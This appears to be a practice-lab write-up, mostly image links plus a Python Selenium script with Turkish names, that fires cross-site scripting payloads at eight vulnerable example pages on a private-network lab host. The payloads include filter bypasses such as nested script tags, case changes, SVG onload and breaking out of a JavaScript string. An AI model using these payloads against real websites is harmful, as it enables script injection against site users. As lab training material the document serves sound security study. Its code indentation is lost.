![](https://i.hizliresim.com/h0f892c.png)
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
![](https://i.hizliresim.com/bjw4ohc.png)
![](https://i.hizliresim.com/6ny7tat.png)
![](https://i.hizliresim.com/h0mbpxx.png)
![](https://i.hizliresim.com/gzn2xw3.png)
![](https://i.hizliresim.com/ae2pza1.png)
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
![](https://i.hizliresim.com/4k4fig8.png)
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
![](https://i.hizliresim.com/hjnwhr9.png)
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
![](https://i.hizliresim.com/kzpylds.png)
![](https://i.hizliresim.com/df35suj.png)
![](https://i.hizliresim.com/sz5v61g.png)
![](https://i.hizliresim.com/rorktk1.png)
![](https://i.hizliresim.com/qgw423k.png)
![](https://i.hizliresim.com/chfntj1.png)
![](https://i.hizliresim.com/4ija5io.png)
![](https://i.hizliresim.com/4h90hrd.png)
![](https://i.hizliresim.com/fjstlpb.png)
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
![](https://i.hizliresim.com/qbrxqa3.png)
///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
![](https://i.hizliresim.com/6ha28tq.png)
Python:
import requests
from selenium import webdriver
import time
import urllib.parse
from bs4 import BeautifulSoup
def sitenin_çıktısını_düzelt(site):
a = BeautifulSoup(requests.get(site).text,'html.parser').find_all("div",{"class":"container"})
b = str(a[1]).replace('<div class="container">\n\n\n\n','').split("<footer>")
print(b[0])
def url_encode(deger):
return urllib.parse.quote(deger)
def büyült(deger,değişken):
return str(değişken.replace(deger,str(deger).upper()))
payloads = ["function deger(kod){return kod;}deger('<script>alert('xss')</script>')",
"<script>alert('xss')</script>",
"<scri<script>pt>alert('xss')</sc</script>ript>",
"<svg onload=alert('xss')"]
#--------------------
def example1():
kod = "<script>alert('xss')</script>"
site = "http://192.168.1.36/xss/example1.php?name=hacker"
browser = webdriver.Firefox()
browser.get(site+kod)
time.sleep(3)
browser.quit()
#----------------------
def example2():
kod = "<script>alert('xss')</script>"
site = "http://192.168.1.36/xss/example2.php?name=hacker"
browser = webdriver.Firefox()
browser.get(site + büyült("script",kod))
time.sleep(2)
browser.quit()
#-----------------------
def example3():
example3_site = "http://192.168.1.36/xss/example3.php?name=hacker"
kod = "<scri<script>pt>alert('xss')</sc</script>ript>"
browser = webdriver.Firefox()
browser.get(example3_site + kod)
time.sleep(3)
browser.quit()
#-----------------------
def example4():
example4_site = "http://192.168.1.36/xss/example4.php?name=hacker"
kod = "<svg onload=alert('xss')"
browser = webdriver.Firefox()
browser.get(example4_site+kod)
time.sleep(3)
browser.quit()
#-----------------------
def example5():
example5_site = 'http://192.168.1.36/xss/example5.php?name=hacker'
kod = "<script>prompt('xss')</script>"
browser = webdriver.Firefox()
browser.get(example5_site+kod)
time.sleep(3)
browser.quit()
#-----------------------
def example6():
example6_site = 'http://192.168.1.36/xss/example6.php?name=hacker'
kod = '"</script><script>alert("xss")</script>//'
browser = webdriver.Firefox()
browser.get(example6_site + kod)
time.sleep(3)
browser.quit()
def example7():
example7_site = 'http://192.168.1.36/xss/example7.php?name=hacker'
kod = "';alert('xss')//"
browser = webdriver.Firefox()
browser.get(example7_site + kod)
time.sleep(3)
browser.quit()
def example8():
example8_site = 'http://192.168.1.36/xss/example8.php'
kod = '/"><script>alert("xss")</script>'
browser = webdriver.Firefox()
browser.get(example8_site + kod)
time.sleep(3)
browser.quit()
example1()
example2()
example3()
example4()
example5()
example6()
example7()
example8()